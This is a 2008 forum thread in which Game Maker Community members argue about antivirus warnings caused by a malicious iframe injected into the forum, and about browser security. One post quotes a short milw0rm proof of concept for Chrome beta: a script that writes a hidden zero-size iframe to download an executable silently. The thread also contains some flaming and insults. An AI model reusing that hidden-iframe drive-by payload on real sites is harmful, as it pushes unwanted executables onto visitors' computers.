Forum Viruses? Options

[thaddeus_maximus]

I found this link
http://www.stopbadware.org/reports/contain...11%26t%3D317426

It is a stopbadware.org report on gmc.yoyogames.com

[gmXpert2000]

Um...why is everybody posting links to random reports on the site? We already know the GMC received malware...

Anyways, I've been using Safari on a Mac, and I didn't get it, so it's obviously a windows only thing. If we didn't already know that

[edmunn]

Um...why is everybody posting links to random reports on the site? We already know the GMC received malware...

Anyways, I've been using Safari on a Mac, and I didn't get it, so it's obviously a windows only thing. If we didn't already know that

Thank you, for stating the obvious. ^^
KC LC said once an Administrator is online, they'll get the message and shut-down the GMC until it's fixed.

[gmXpert2000]

Thank you, for stating the obvious. ^^

You are quite welcome.

Are people still getting the warning message, even now?

[Jumpey]

I first noticed this last night. Why do people think if they don't get a warning message with a particular browser that that browser is immune, that is more a bad thing to happen. Most browsers/anti-viruses will warn you when a virus is detected, so if they don't, it's could be infecting you. You should want the error message, because it tells you that the browser knows it is a virus, albeit not on every page load.

Are people still getting the warning message, even now?

Yep, an admin will tell us when the problem is fixed, it won't just go away by itself.

[gmXpert2000]

Yep, an admin will tell us when the problem is fixed, it won't just go away by itself.

I assumed that. I'm just surprised an administrator hasn't been online at all today. Would have thought they would have fixed it/worked on it behind the scenes.

[Dangerous_Dave]

I'm surprised people are moving to chrome because its so secure. Does noone read NPT's blog?

[Meta Black Yoshi]

I just like to point out that I only seem to get attacked when I visit the front page. I first noticed the virus, which was automaticaly blocked and deleted, early yesterday morning, (early like before I went to bed). There were 2 instances of it and some suspicios things I found running in the task manager. Then latter yesterday morning after I woke up, I brought the site up on google and it had the warning. I've been entering the site through a topic ever since so I havn't been going through the front page and the only thing I've noticed up until now is that when ever I press the back button I get an Activex messege. Just now however, I went to the front page and was attacked again by one virus and then again when I refreshed the page (no extras running in the task manager). I'm not sure if anyone else experiences the same things.

I've been using IE, and just so you know, I don't really favor either browser over the other between IE and FF. I use them both on my laptop although on my mom's computer I've had to resort to using FF exclusivly because her old version of IE seems to have contracted some horrible virus that makes everything run slow, even though I did manage to get rid of most of the nasty files. It seems that things still run slow and I'm sure most of the blame can be placed on my file-hungry sister and cusin who, fortunatly, have both been banned from using her computer completly. I'm sure the'll try to use it anyway and will probably download more of who knows what.

But anyway...If some people are getting really anoyed at virus messeges ,without adding extra risks you might be able to bypass them by skipping the front page and entering the site from a topic like I was doing. Just a simple suggestion, nothing like re-instaling windows or anything that might cause more harm than solution.

I realize this post may not have very much significance and that YYG will probably have the problem fixed in a day or 2 but I just kind of felt like posting. Also..., I could't resist commenting on one of my favorite posts in the topic.

I want Yo-yo games to take action for once on this forum instead having their incompetent Mods deal with it and when they deal with it they just delete the post. Yo-yo games need to take action and stop relying on incompetent Mods to handle stuff cause all they do is delete any post and say post about it in Yo-yo games web site.

That doesn't work either so yo-yo games need to take action and stop letting incompetent Mods handle stuff they can't

They need to get this fixed and stop relying on their mods to handle stuff like this.

BTW, I just got done doing a Technical Writing assignment about removing repetition and redundancy and when I saw this post I was allmost in tears.....












.......because I was laughing so much!!!
>.> Really, why else would it be? I love bad grammer in a non-contributing post within a topic that dosn't really matter. I also get a kick out of watching other people flame the mess out of eachother...so enugh with all this "agreeing" and stuff. In the words of Mr. L33T!1111 I decree, "MOAR WAR!"

[DarkFlame]

Does noone read NPT's blog?

Why should we? I mean you make it sound like we should do it every night before bed, its just one persons rant, and many 'bloggers' are so misinformed that it just misinforms the readers further, kind of like chinsese whispers

I have nod32, with its threat sense it believes multiple downloads are a form of virus, also if i open many links at once (for instance split .rar archives) it will instantly close firefox (no warning) so i would like to point out that if it even suspected that at one time there was malware anywhere on this forum it would of shut down firefox before any data could be sent or received. I think we are all safe and that something is wrong on your computer.


But ofcoarse yyg may have brainwashed me


EDIT:

I've been using IE

IE is a great browser, but as it happens it isnt very bright, it second guesses too much and is usually set to 'if in doubt, stay out'

Many websites have 'doubts' but are totally safe

This post has been edited by DarkFlame: Sep 8 2008, 07:37 AM

[uuf6429]

I can't get you people, are you all DUMB or what?

When me and a friend fisrt found this issue, we reported it back to the admins. No mod can fix it, even if I am sure some of them a more then capable to do so (given they are web developers not just kiddies).

Secondly, the GMC DOES NOT HAVE A VIRUS DID YOU GET THAT?!
An iframe means your ***hole of a browser follows it directly to where there is the virus ON AN EXTERNAL SITE.

Do not come up with ideas of "this browser is better then that". This system is exactly what iframes where designed for - and it is not in the least harmfull.
Plus, if your browser doesn't support iframes, and is immune to this, it is not at all good as iframes are very important in web design.
So does not getting warnings/errors of any kind, can count there browser as ****.

thaddeus_maximus - As to the sites blackilisting the GMC, is just routine. In fact, I personally advised an agency about this problem. They are there just to limit infections - in fact Google has the option of removing a site from being blacklisted, as do some of the other blacklist websites.

I'm surprised people are moving to chrome because its so secure. Does noone read NPT's blog?

Secure, you've got to be kidding!
For the lazy **** out there here's the exploit named in the link:

CODE

**************************************************
*************************
Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************
************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]

Basically it specifies that chrome users can soon start finding executables (or any file) automatically downloaded from the internet.

This post has been edited by uuf6429: Sep 8 2008, 07:58 AM

[FredFredrickson]

Aaaalllrighty, guys. Do we really need to argue over which browser is better, whose blog should be read every night before bedtime, or what's going to be done when an admin gets online...?

Let's just take a big breath, relax, and go do something else for a while. No need to bicker back and forth over this stuff.

[Dangerous_Dave]

Why should we? I mean you make it sound like we should do it every night before bed, its just one persons rant, and many 'bloggers' are so misinformed that it just misinforms the readers further, kind of like chinsese whispers

Wow, someone was abused by a blog in a past life...

I have nod32, with its threat sense it believes multiple downloads are a form of virus, also if i open many links at once (for instance split .rar archives) it will instantly close firefox (no warning) so i would like to point out that if it even suspected that at one time there was malware anywhere on this forum it would of shut down firefox before any data could be sent or received. I think we are all safe and that something is wrong on your computer.

I think it's safe to assume that since so many people are getting this message, it's almost definatly on the GMC end and not a client side problem. I don't get the messages, but maybe thats because I don't have any form of virus/badware protection.

IE is a great browser, but as it happens it isnt very bright, it second guesses too much and is usually set to 'if in doubt, stay out'

Many websites have 'doubts' but are totally safe

IE is designed for use by anyone. If there are doubts, you and I can decide what the risks are, if there are in fact any, and whether it's worth the risk. Not everyone understands all those kind of things. For example, the other day my father was on the internet when a window popped up and asked if he would like to scan the computer for viruses. He thought that sounded like a good idea, and hit OK. Turns out it wasn't a good idea, and it took me wuite a while to get it to boot windows again... One of my friends has their mothers browser set up so she can only go to certain websites (such as email and a trusted game site). Not everyone can judge the risks like you and I, and thats why "if in doubt, stay out" is a system that works for them.

@uuf6429: The cchome problem is because they used an old version of webkit (the same used in safari 3.1 I think). The flaw was corrected in version 3.1.2, so it should only be a matter of time before google fixes that.

This post has been edited by Dangerous_Dave: Sep 8 2008, 08:08 AM

[Waffles]

Yea as soon I updated my avast virus scanner, i got a "malware" from gmc the next thing i clicked on, im guessing the latest avast definitions has a false positive or something.

I use the latest version of firefox 2 whatever that is if it helps.

This post has been edited by Waffles: Sep 8 2008, 08:14 AM

[uuf6429]

Sorry guys but I'm fed up trying to explain this thing.

[DarkFlame]

Sorry guys but I'm fed up trying to explain this thing.

Go to a topic about google chrome.

I think it's safe to assume that since so many people are getting this message, it's almost definatly on the GMC end and not a client side problem. I don't get the messages, but maybe thats because I don't have any form of virus/badware protection.

Thats a good point, but most people use one of three anti-virus' and the manufacturers share the same info on whats a virus and what isn't.
But im not saying your wrong, its just odd that nod32 which is notoriously annoying to work around for its insane security measures has no problem, even with this whole 'threatsense'

Wow, someone was abused by a blog in a past life...

Nothing against blogs, but they aren't anything special, and they are never a reliable source of information in any form.
This is just my opinion but they really have no place in a topic discussing facts.

I think there isnt much point discussing this further until someone who knows what the problem is comes forward and tells us, otherwise we are all chasing our tails.

[uuf6429]

Go to a topic about google chrome.

People has been talking about how secure it is.

I just showed how people tend to become blatantly stupid.

[Dangerous_Dave]

Thats a good point, but most people use one of three anti-virus' and the manufacturers share the same info on whats a virus and what isn't.
But im not saying your wrong, its just odd that nod32 which is notoriously annoying to work around for its insane security measures has no problem, even with this whole 'threatsense'

So you think because one program doesn't recognise the virus, the others that do should be ignored? Unless its just not in the nod32 virus database, it may be a difference of opinion as to what is a threat.

Nothing against blogs, but they aren't anything special, and they are never a reliable source of information in any form.
This is just my opinion but they really have no place in a topic discussing facts.

A blog is about as reliable as word of mouth. But that doesn't mean it's wrong, especially when proof is offered.
Also, some of us read the blogs for the enterainment, and occasinally learn a thing or two when there are facts.

I think there isnt much point discussing this further until someone who knows what the problem is comes forward and tells us, otherwise we are all chasing our tails.

I need the exercise.

[uuf6429]

DarkFlame, either you are an idiot or you didn't read any of these posts.

We know where there is the problem (at least I do). In fact I'm trying to fix it now .

But in any case usually it's the webmaster/admins' job to fix such a thing not a whitehat .

[DarkFlame]

So you think because one program doesn't recognise the virus, the others that do should be ignored? Unless its just not in the nod32 virus database, it may be a difference of opinion as to what is a threat.

No i dont think that, im saying that an anti-virus which goes over board in protection, to the extent of closing msn if i leave a window untended, has found no problems.

A blog is about as reliable as word of mouth. But that doesn't mean it's wrong, especially when proof is offered.
Also, some of us read the blogs for the enterainment, and occasinally learn a thing or two when there are facts.

Its less reliable, first reason is its easier to lie to a bunch of people you dont know or have to see face to face.
Secondly because the information is usually from another blog. And really, why are we talking about blogs?

I need the exercise.

Get an exercycle

Im leaving this topic now and will probably check back only to see the outcome, so please do not direct any comments to me

QUICK EDIT FIRST:

DarkFlame, either you are an idiot or you didn't read any of these posts.

I like how you call me an idiot, and infact alot of people idiots, when none of them have actually said anything wrong. Perhaps you are an idiot because you are shooting your mouth off like we should all be praising you?

I read a post of yours that was about google chrome, but its nothing to do with the problem that is at hand.

We know where there is the problem (at least I do). In fact I'm trying to fix it now

[sarcasm]Wow thats so smart of you, i wish i could be like you some day[/sarcasm]

This post has been edited by DarkFlame: Sep 8 2008, 09:05 AM

[Dangerous_Dave]

No i dont think that, im saying that an anti-virus which goes over board in protection, to the extent of closing msn if i leave a window untended, has found no problems.

In that case its more likely its missing from the virus database.

Its less reliable, first reason is its easier to lie to a bunch of people you dont know or have to see face to face.
Secondly because the information is usually from another blog. And really, why are we talking about blogs?

Its hard to lie when you have proof about what you're pushing. And I doubt many bloggers intentionally lie.

Get an exercycle

Can't afford it. Chasing tails is cheaper.

Im leaving this topic now and will probably check back only to see the outcome, so please do not direct any comments to me

I'm the boss of me